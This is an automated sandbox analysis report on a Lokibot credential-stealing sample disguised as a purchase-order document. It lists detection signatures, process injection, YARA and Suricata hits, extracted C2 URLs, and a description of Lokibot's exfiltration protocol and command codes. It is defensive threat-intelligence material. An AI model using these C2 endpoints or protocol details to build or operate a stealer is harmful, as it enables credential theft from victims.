Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
(PO403810)_VOLEX_doc.exe

Overview

General Information

Sample name:(PO403810)_VOLEX_doc.exe
Analysis ID:1517995
MD5:aa2edba076823e2d67c52d3055a15e80
SHA1:f8ab944af1bf067fcd7f6806311ccd98374d98cd
SHA256:506acdbf6f6334fb4b7519e45d60f3c90b115853fa4b76d0670bf20698f4c7c4
Tags:exeuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • (PO403810)_VOLEX_doc.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe" MD5: AA2EDBA076823E2D67C52D3055A15E80)
    • aspnet_compiler.exe (PID: 720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 21 entries
          SourceRuleDescriptionAuthorStrings
          0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 24 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe", ParentImage: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe, ParentProcessId: 6936, ParentProcessName: (PO403810)_VOLEX_doc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 720, ProcessName: aspnet_compiler.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:09.125494+020020243121A Network Trojan was detected192.168.2.749699188.114.97.380TCP
            2024-09-25T10:19:09.982295+020020243121A Network Trojan was detected192.168.2.749700188.114.97.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:08.211638+020020253811Malware Command and Control Activity Detected192.168.2.749699188.114.97.380TCP
            2024-09-25T10:19:09.263458+020020253811Malware Command and Control Activity Detected192.168.2.749700188.114.97.380TCP
            2024-09-25T10:19:10.062927+020020253811Malware Command and Control Activity Detected192.168.2.749701188.114.97.380TCP
            2024-09-25T10:19:10.969314+020020253811Malware Command and Control Activity Detected192.168.2.749702188.114.97.380TCP
            2024-09-25T10:19:11.837774+020020253811Malware Command and Control Activity Detected192.168.2.749703188.114.97.380TCP
            2024-09-25T10:19:12.688864+020020253811Malware Command and Control Activity Detected192.168.2.749704188.114.97.380TCP
            2024-09-25T10:19:13.615421+020020253811Malware Command and Control Activity Detected192.168.2.749705188.114.97.380TCP
            2024-09-25T10:19:14.711569+020020253811Malware Command and Control Activity Detected192.168.2.749706188.114.97.380TCP
            2024-09-25T10:19:15.581402+020020253811Malware Command and Control Activity Detected192.168.2.749707188.114.97.380TCP
            2024-09-25T10:19:16.376989+020020253811Malware Command and Control Activity Detected192.168.2.749708188.114.97.380TCP
            2024-09-25T10:19:17.178646+020020253811Malware Command and Control Activity Detected192.168.2.749709188.114.97.380TCP
            2024-09-25T10:19:18.296157+020020253811Malware Command and Control Activity Detected192.168.2.749710188.114.97.380TCP
            2024-09-25T10:19:19.154274+020020253811Malware Command and Control Activity Detected192.168.2.749711188.114.97.380TCP
            2024-09-25T10:19:20.137435+020020253811Malware Command and Control Activity Detected192.168.2.749712188.114.97.380TCP
            2024-09-25T10:19:21.053477+020020253811Malware Command and Control Activity Detected192.168.2.749713188.114.97.380TCP
            2024-09-25T10:19:21.842648+020020253811Malware Command and Control Activity Detected192.168.2.749714188.114.97.380TCP
            2024-09-25T10:19:22.855192+020020253811Malware Command and Control Activity Detected192.168.2.749715188.114.97.380TCP
            2024-09-25T10:19:23.676953+020020253811Malware Command and Control Activity Detected192.168.2.749718188.114.97.380TCP
            2024-09-25T10:19:24.570672+020020253811Malware Command and Control Activity Detected192.168.2.749720188.114.97.380TCP
            2024-09-25T10:19:25.439700+020020253811Malware Command and Control Activity Detected192.168.2.749723188.114.97.380TCP
            2024-09-25T10:19:27.269752+020020253811Malware Command and Control Activity Detected192.168.2.749724188.114.97.380TCP
            2024-09-25T10:19:28.206792+020020253811Malware Command and Control Activity Detected192.168.2.749725188.114.97.380TCP
            2024-09-25T10:19:29.037709+020020253811Malware Command and Control Activity Detected192.168.2.749726188.114.97.380TCP
            2024-09-25T10:19:29.847888+020020253811Malware Command and Control Activity Detected192.168.2.749727188.114.97.380TCP
            2024-09-25T10:19:30.733826+020020253811Malware Command and Control Activity Detected192.168.2.749728188.114.97.380TCP
            2024-09-25T10:19:32.177777+020020253811Malware Command and Control Activity Detected192.168.2.749729188.114.97.380TCP
            2024-09-25T10:19:32.989857+020020253811Malware Command and Control Activity Detected192.168.2.749730188.114.97.380TCP
            2024-09-25T10:19:33.800027+020020253811Malware Command and Control Activity Detected192.168.2.749731188.114.97.380TCP
            2024-09-25T10:19:34.631187+020020253811Malware Command and Control Activity Detected192.168.2.749732188.114.97.380TCP
            2024-09-25T10:19:35.482687+020020253811Malware Command and Control Activity Detected192.168.2.749733188.114.97.380TCP
            2024-09-25T10:19:36.537688+020020253811Malware Command and Control Activity Detected192.168.2.749734188.114.97.380TCP
            2024-09-25T10:19:37.356070+020020253811Malware Command and Control Activity Detected192.168.2.749735188.114.97.380TCP
            2024-09-25T10:19:39.239881+020020253811Malware Command and Control Activity Detected192.168.2.749736188.114.97.380TCP
            2024-09-25T10:19:40.078687+020020253811Malware Command and Control Activity Detected192.168.2.749737188.114.97.380TCP
            2024-09-25T10:19:40.911451+020020253811Malware Command and Control Activity Detected192.168.2.749738188.114.97.380TCP
            2024-09-25T10:19:41.735560+020020253811Malware Command and Control Activity Detected192.168.2.749739188.114.97.380TCP
            2024-09-25T10:19:42.570720+020020253811Malware Command and Control Activity Detected192.168.2.749740188.114.97.380TCP
            2024-09-25T10:19:43.399885+020020253811Malware Command and Control Activity Detected192.168.2.749741188.114.97.380TCP
            2024-09-25T10:19:44.190956+020020253811Malware Command and Control Activity Detected192.168.2.749742188.114.97.380TCP
            2024-09-25T10:19:45.016789+020020253811Malware Command and Control Activity Detected192.168.2.749743188.114.97.380TCP
            2024-09-25T10:19:45.828745+020020253811Malware Command and Control Activity Detected192.168.2.749744188.114.97.380TCP
            2024-09-25T10:19:46.711712+020020253811Malware Command and Control Activity Detected192.168.2.749745188.114.97.380TCP
            2024-09-25T10:19:47.595407+020020253811Malware Command and Control Activity Detected192.168.2.749746188.114.97.380TCP
            2024-09-25T10:19:48.437321+020020253811Malware Command and Control Activity Detected192.168.2.749747188.114.97.380TCP
            2024-09-25T10:19:49.234722+020020253811Malware Command and Control Activity Detected192.168.2.749748188.114.97.380TCP
            2024-09-25T10:19:50.049266+020020253811Malware Command and Control Activity Detected192.168.2.749749188.114.97.380TCP
            2024-09-25T10:19:50.858143+020020253811Malware Command and Control Activity Detected192.168.2.749750188.114.97.380TCP
            2024-09-25T10:19:51.659793+020020253811Malware Command and Control Activity Detected192.168.2.749751188.114.97.380TCP
            2024-09-25T10:19:52.634585+020020253811Malware Command and Control Activity Detected192.168.2.749752188.114.97.380TCP
            2024-09-25T10:19:53.523329+020020253811Malware Command and Control Activity Detected192.168.2.749753188.114.97.380TCP
            2024-09-25T10:19:54.536452+020020253811Malware Command and Control Activity Detected192.168.2.749754188.114.97.380TCP
            2024-09-25T10:19:55.485678+020020253811Malware Command and Control Activity Detected192.168.2.749755188.114.97.380TCP
            2024-09-25T10:19:56.301649+020020253811Malware Command and Control Activity Detected192.168.2.749756188.114.97.380TCP
            2024-09-25T10:19:57.172763+020020253811Malware Command and Control Activity Detected192.168.2.749757188.114.97.380TCP
            2024-09-25T10:19:59.000979+020020253811Malware Command and Control Activity Detected192.168.2.749758188.114.97.380TCP
            2024-09-25T10:19:59.891904+020020253811Malware Command and Control Activity Detected192.168.2.749759188.114.97.380TCP
            2024-09-25T10:20:00.718978+020020253811Malware Command and Control Activity Detected192.168.2.749760188.114.97.380TCP
            2024-09-25T10:20:01.526168+020020253811Malware Command and Control Activity Detected192.168.2.749761188.114.97.380TCP
            2024-09-25T10:20:02.392071+020020253811Malware Command and Control Activity Detected192.168.2.749763188.114.97.380TCP
            2024-09-25T10:20:03.257255+020020253811Malware Command and Control Activity Detected192.168.2.749764188.114.97.380TCP
            2024-09-25T10:20:04.071220+020020253811Malware Command and Control Activity Detected192.168.2.749765188.114.97.380TCP
            2024-09-25T10:20:05.030104+020020253811Malware Command and Control Activity Detected192.168.2.749766188.114.97.380TCP
            2024-09-25T10:20:05.858737+020020253811Malware Command and Control Activity Detected192.168.2.749767188.114.97.380TCP
            2024-09-25T10:20:06.718238+020020253811Malware Command and Control Activity Detected192.168.2.749768188.114.97.380TCP
            2024-09-25T10:20:07.582940+020020253811Malware Command and Control Activity Detected192.168.2.749769188.114.97.380TCP
            2024-09-25T10:20:09.443638+020020253811Malware Command and Control Activity Detected192.168.2.749770188.114.97.380TCP
            2024-09-25T10:20:10.343573+020020253811Malware Command and Control Activity Detected192.168.2.749771188.114.97.380TCP
            2024-09-25T10:20:11.162336+020020253811Malware Command and Control Activity Detected192.168.2.749772188.114.97.380TCP
            2024-09-25T10:20:11.972432+020020253811Malware Command and Control Activity Detected192.168.2.749773188.114.97.380TCP
            2024-09-25T10:20:12.784342+020020253811Malware Command and Control Activity Detected192.168.2.749774188.114.97.380TCP
            2024-09-25T10:20:13.600309+020020253811Malware Command and Control Activity Detected192.168.2.749775188.114.97.380TCP
            2024-09-25T10:20:14.393221+020020253811Malware Command and Control Activity Detected192.168.2.749776188.114.97.380TCP
            2024-09-25T10:20:15.204070+020020253811Malware Command and Control Activity Detected192.168.2.749777188.114.97.380TCP
            2024-09-25T10:20:16.046849+020020253811Malware Command and Control Activity Detected192.168.2.749778188.114.97.380TCP
            2024-09-25T10:20:16.874999+020020253811Malware Command and Control Activity Detected192.168.2.749779188.114.97.380TCP
            2024-09-25T10:20:17.701124+020020253811Malware Command and Control Activity Detected192.168.2.749780188.114.97.380TCP
            2024-09-25T10:20:18.577128+020020253811Malware Command and Control Activity Detected192.168.2.749781188.114.97.380TCP
            2024-09-25T10:20:19.388646+020020253811Malware Command and Control Activity Detected192.168.2.749782188.114.97.380TCP
            2024-09-25T10:20:20.429528+020020253811Malware Command and Control Activity Detected192.168.2.749783188.114.97.380TCP
            2024-09-25T10:20:21.233233+020020253811Malware Command and Control Activity Detected192.168.2.749784188.114.97.380TCP
            2024-09-25T10:20:22.045367+020020253811Malware Command and Control Activity Detected192.168.2.749785188.114.97.380TCP
            2024-09-25T10:20:22.876653+020020253811Malware Command and Control Activity Detected192.168.2.749786188.114.97.380TCP
            2024-09-25T10:20:23.686182+020020253811Malware Command and Control Activity Detected192.168.2.749787188.114.97.380TCP
            2024-09-25T10:20:24.545070+020020253811Malware Command and Control Activity Detected192.168.2.749788188.114.97.380TCP
            2024-09-25T10:20:25.516198+020020253811Malware Command and Control Activity Detected192.168.2.749789188.114.97.380TCP
            2024-09-25T10:20:26.367186+020020253811Malware Command and Control Activity Detected192.168.2.749790188.114.97.380TCP
            2024-09-25T10:20:27.187595+020020253811Malware Command and Control Activity Detected192.168.2.749791188.114.97.380TCP
            2024-09-25T10:20:28.005117+020020253811Malware Command and Control Activity Detected192.168.2.749792188.114.97.380TCP
            2024-09-25T10:20:28.823348+020020253811Malware Command and Control Activity Detected192.168.2.749793188.114.97.380TCP
            2024-09-25T10:20:29.793057+020020253811Malware Command and Control Activity Detected192.168.2.749794188.114.97.380TCP
            2024-09-25T10:20:30.724248+020020253811Malware Command and Control Activity Detected192.168.2.749795188.114.97.380TCP
            2024-09-25T10:20:31.529840+020020253811Malware Command and Control Activity Detected192.168.2.749796188.114.97.380TCP
            2024-09-25T10:20:32.349270+020020253811Malware Command and Control Activity Detected192.168.2.749797188.114.97.380TCP
            2024-09-25T10:20:33.159073+020020253811Malware Command and Control Activity Detected192.168.2.749798188.114.97.380TCP
            2024-09-25T10:20:34.004751+020020253811Malware Command and Control Activity Detected192.168.2.749799188.114.97.380TCP
            2024-09-25T10:20:34.831696+020020253811Malware Command and Control Activity Detected192.168.2.749800188.114.97.380TCP
            2024-09-25T10:20:35.676731+020020253811Malware Command and Control Activity Detected192.168.2.749801188.114.97.380TCP
            2024-09-25T10:20:36.488105+020020253811Malware Command and Control Activity Detected192.168.2.749802188.114.97.380TCP
            2024-09-25T10:20:37.347438+020020253811Malware Command and Control Activity Detected192.168.2.749803188.114.97.380TCP
            2024-09-25T10:20:38.170705+020020253811Malware Command and Control Activity Detected192.168.2.749804188.114.97.380TCP
            2024-09-25T10:20:38.983344+020020253811Malware Command and Control Activity Detected192.168.2.749805188.114.97.380TCP
            2024-09-25T10:20:39.812510+020020253811Malware Command and Control Activity Detected192.168.2.749806188.114.97.380TCP
            2024-09-25T10:20:40.679656+020020253811Malware Command and Control Activity Detected192.168.2.749807188.114.97.380TCP
            2024-09-25T10:20:41.532089+020020253811Malware Command and Control Activity Detected192.168.2.749808188.114.97.380TCP
            2024-09-25T10:20:42.407099+020020253811Malware Command and Control Activity Detected192.168.2.749809188.114.97.380TCP
            2024-09-25T10:20:43.201046+020020253811Malware Command and Control Activity Detected192.168.2.749810188.114.97.380TCP
            2024-09-25T10:20:44.020697+020020253811Malware Command and Control Activity Detected192.168.2.749811188.114.97.380TCP
            2024-09-25T10:20:44.843940+020020253811Malware Command and Control Activity Detected192.168.2.749812188.114.97.380TCP
            2024-09-25T10:20:45.767835+020020253811Malware Command and Control Activity Detected192.168.2.749813188.114.97.380TCP
            2024-09-25T10:20:46.581998+020020253811Malware Command and Control Activity Detected192.168.2.749814188.114.97.380TCP
            2024-09-25T10:20:47.383984+020020253811Malware Command and Control Activity Detected192.168.2.749815188.114.97.380TCP
            2024-09-25T10:20:48.345316+020020253811Malware Command and Control Activity Detected192.168.2.749816188.114.97.380TCP
            2024-09-25T10:20:49.177011+020020253811Malware Command and Control Activity Detected192.168.2.749817188.114.97.380TCP
            2024-09-25T10:20:50.264754+020020253811Malware Command and Control Activity Detected192.168.2.749818188.114.97.380TCP
            2024-09-25T10:20:51.117098+020020253811Malware Command and Control Activity Detected192.168.2.749819188.114.97.380TCP
            2024-09-25T10:20:51.965926+020020253811Malware Command and Control Activity Detected192.168.2.749820188.114.97.380TCP
            2024-09-25T10:20:52.847890+020020253811Malware Command and Control Activity Detected192.168.2.749821188.114.97.380TCP
            2024-09-25T10:20:53.648400+020020253811Malware Command and Control Activity Detected192.168.2.749822188.114.97.380TCP
            2024-09-25T10:20:54.469239+020020253811Malware Command and Control Activity Detected192.168.2.749823188.114.97.380TCP
            2024-09-25T10:20:55.277763+020020253811Malware Command and Control Activity Detected192.168.2.749824188.114.97.380TCP
            2024-09-25T10:20:56.095548+020020253811Malware Command and Control Activity Detected192.168.2.749825188.114.97.380TCP
            2024-09-25T10:20:56.943672+020020253811Malware Command and Control Activity Detected192.168.2.749826188.114.97.380TCP
            2024-09-25T10:20:57.765117+020020253811Malware Command and Control Activity Detected192.168.2.749827188.114.97.380TCP
            2024-09-25T10:20:58.604735+020020253811Malware Command and Control Activity Detected192.168.2.749828188.114.97.380TCP
            2024-09-25T10:21:00.485716+020020253811Malware Command and Control Activity Detected192.168.2.749829188.114.97.380TCP
            2024-09-25T10:21:00.652378+020020253811Malware Command and Control Activity Detected192.168.2.749830188.114.97.380TCP
            2024-09-25T10:21:01.509563+020020253811Malware Command and Control Activity Detected192.168.2.749831188.114.97.380TCP
            2024-09-25T10:21:02.530015+020020253811Malware Command and Control Activity Detected192.168.2.749832188.114.97.380TCP
            2024-09-25T10:21:03.370905+020020253811Malware Command and Control Activity Detected192.168.2.749833188.114.97.380TCP
            2024-09-25T10:21:04.493818+020020253811Malware Command and Control Activity Detected192.168.2.749834188.114.97.380TCP
            2024-09-25T10:21:05.272946+020020253811Malware Command and Control Activity Detected192.168.2.749835188.114.97.380TCP
            2024-09-25T10:21:06.101214+020020253811Malware Command and Control Activity Detected192.168.2.749836188.114.97.380TCP
            2024-09-25T10:21:06.901425+020020253811Malware Command and Control Activity Detected192.168.2.749837188.114.97.380TCP
            2024-09-25T10:21:07.859251+020020253811Malware Command and Control Activity Detected192.168.2.749838188.114.97.380TCP
            2024-09-25T10:21:09.943417+020020253811Malware Command and Control Activity Detected192.168.2.749839188.114.97.380TCP
            2024-09-25T10:21:10.818081+020020253811Malware Command and Control Activity Detected192.168.2.749840188.114.97.380TCP
            2024-09-25T10:21:11.674440+020020253811Malware Command and Control Activity Detected192.168.2.749841188.114.97.380TCP
            2024-09-25T10:21:12.571148+020020253811Malware Command and Control Activity Detected192.168.2.749842188.114.97.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:02.551070+020020254831A Network Trojan was detected188.114.97.380192.168.2.749842TCP
            2024-09-25T10:19:10.817841+020020254831A Network Trojan was detected188.114.97.380192.168.2.749701TCP
            2024-09-25T10:19:11.670551+020020254831A Network Trojan was detected188.114.97.380192.168.2.749702TCP
            2024-09-25T10:19:12.537084+020020254831A Network Trojan was detected188.114.97.380192.168.2.749703TCP
            2024-09-25T10:19:13.460991+020020254831A Network Trojan was detected188.114.97.380192.168.2.749704TCP
            2024-09-25T10:19:14.459844+020020254831A Network Trojan was detected188.114.97.380192.168.2.749705TCP
            2024-09-25T10:19:15.404341+020020254831A Network Trojan was detected188.114.97.380192.168.2.749706TCP
            2024-09-25T10:19:16.225141+020020254831A Network Trojan was detected188.114.97.380192.168.2.749707TCP
            2024-09-25T10:19:17.026938+020020254831A Network Trojan was detected188.114.97.380192.168.2.749708TCP
            2024-09-25T10:19:18.146905+020020254831A Network Trojan was detected188.114.97.380192.168.2.749709TCP
            2024-09-25T10:19:18.992492+020020254831A Network Trojan was detected188.114.97.380192.168.2.749710TCP
            2024-09-25T10:19:19.799882+020020254831A Network Trojan was detected188.114.97.380192.168.2.749711TCP
            2024-09-25T10:19:20.903837+020020254831A Network Trojan was detected188.114.97.380192.168.2.749712TCP
            2024-09-25T10:19:21.694245+020020254831A Network Trojan was detected188.114.97.380192.168.2.749713TCP
            2024-09-25T10:19:22.570360+020020254831A Network Trojan was detected188.114.97.380192.168.2.749714TCP
            2024-09-25T10:19:23.523583+020020254831A Network Trojan was detected188.114.97.380192.168.2.749715TCP
            2024-09-25T10:19:24.370931+020020254831A Network Trojan was detected188.114.97.380192.168.2.749718TCP
            2024-09-25T10:19:25.291419+020020254831A Network Trojan was detected188.114.97.380192.168.2.749720TCP
            2024-09-25T10:19:27.096966+020020254831A Network Trojan was detected188.114.97.380192.168.2.749723TCP
            2024-09-25T10:19:28.050244+020020254831A Network Trojan was detected188.114.97.380192.168.2.749724TCP
            2024-09-25T10:19:28.886614+020020254831A Network Trojan was detected188.114.97.380192.168.2.749725TCP
            2024-09-25T10:19:29.685693+020020254831A Network Trojan was detected188.114.97.380192.168.2.749726TCP
            2024-09-25T10:19:30.588201+020020254831A Network Trojan was detected188.114.97.380192.168.2.749727TCP
            2024-09-25T10:19:31.401029+020020254831A Network Trojan was detected188.114.97.380192.168.2.749728TCP
            2024-09-25T10:19:32.832107+020020254831A Network Trojan was detected188.114.97.380192.168.2.749729TCP
            2024-09-25T10:19:33.633464+020020254831A Network Trojan was detected188.114.97.380192.168.2.749730TCP
            2024-09-25T10:19:34.472797+020020254831A Network Trojan was detected188.114.97.380192.168.2.749731TCP
            2024-09-25T10:19:35.322924+020020254831A Network Trojan was detected188.114.97.380192.168.2.749732TCP
            2024-09-25T10:19:36.371522+020020254831A Network Trojan was detected188.114.97.380192.168.2.749733TCP
            2024-09-25T10:19:37.195299+020020254831A Network Trojan was detected188.114.97.380192.168.2.749734TCP
            2024-09-25T10:19:38.145206+020020254831A Network Trojan was detected188.114.97.380192.168.2.749735TCP
            2024-09-25T10:19:39.906710+020020254831A Network Trojan was detected188.114.97.380192.168.2.749736TCP
            2024-09-25T10:19:40.757426+020020254831A Network Trojan was detected188.114.97.380192.168.2.749737TCP
            2024-09-25T10:19:41.586005+020020254831A Network Trojan was detected188.114.97.380192.168.2.749738TCP
            2024-09-25T10:19:42.418949+020020254831A Network Trojan was detected188.114.97.380192.168.2.749739TCP
            2024-09-25T10:19:43.246416+020020254831A Network Trojan was detected188.114.97.380192.168.2.749740TCP
            2024-09-25T10:19:44.032597+020020254831A Network Trojan was detected188.114.97.380192.168.2.749741TCP
            2024-09-25T10:19:44.857234+020020254831A Network Trojan was detected188.114.97.380192.168.2.749742TCP
            2024-09-25T10:19:45.671293+020020254831A Network Trojan was detected188.114.97.380192.168.2.749743TCP
            2024-09-25T10:19:46.551465+020020254831A Network Trojan was detected188.114.97.380192.168.2.749744TCP
            2024-09-25T10:19:47.447756+020020254831A Network Trojan was detected188.114.97.380192.168.2.749745TCP
            2024-09-25T10:19:48.282001+020020254831A Network Trojan was detected188.114.97.380192.168.2.749746TCP
            2024-09-25T10:19:49.081572+020020254831A Network Trojan was detected188.114.97.380192.168.2.749747TCP
            2024-09-25T10:19:49.890230+020020254831A Network Trojan was detected188.114.97.380192.168.2.749748TCP
            2024-09-25T10:19:50.713445+020020254831A Network Trojan was detected188.114.97.380192.168.2.749749TCP
            2024-09-25T10:19:51.512658+020020254831A Network Trojan was detected188.114.97.380192.168.2.749750TCP
            2024-09-25T10:19:52.356086+020020254831A Network Trojan was detected188.114.97.380192.168.2.749751TCP
            2024-09-25T10:19:53.360531+020020254831A Network Trojan was detected188.114.97.380192.168.2.749752TCP
            2024-09-25T10:19:54.191774+020020254831A Network Trojan was detected188.114.97.380192.168.2.749753TCP
            2024-09-25T10:19:55.331030+020020254831A Network Trojan was detected188.114.97.380192.168.2.749754TCP
            2024-09-25T10:19:56.131913+020020254831A Network Trojan was detected188.114.97.380192.168.2.749755TCP
            2024-09-25T10:19:57.014226+020020254831A Network Trojan was detected188.114.97.380192.168.2.749756TCP
            2024-09-25T10:19:58.854920+020020254831A Network Trojan was detected188.114.97.380192.168.2.749757TCP
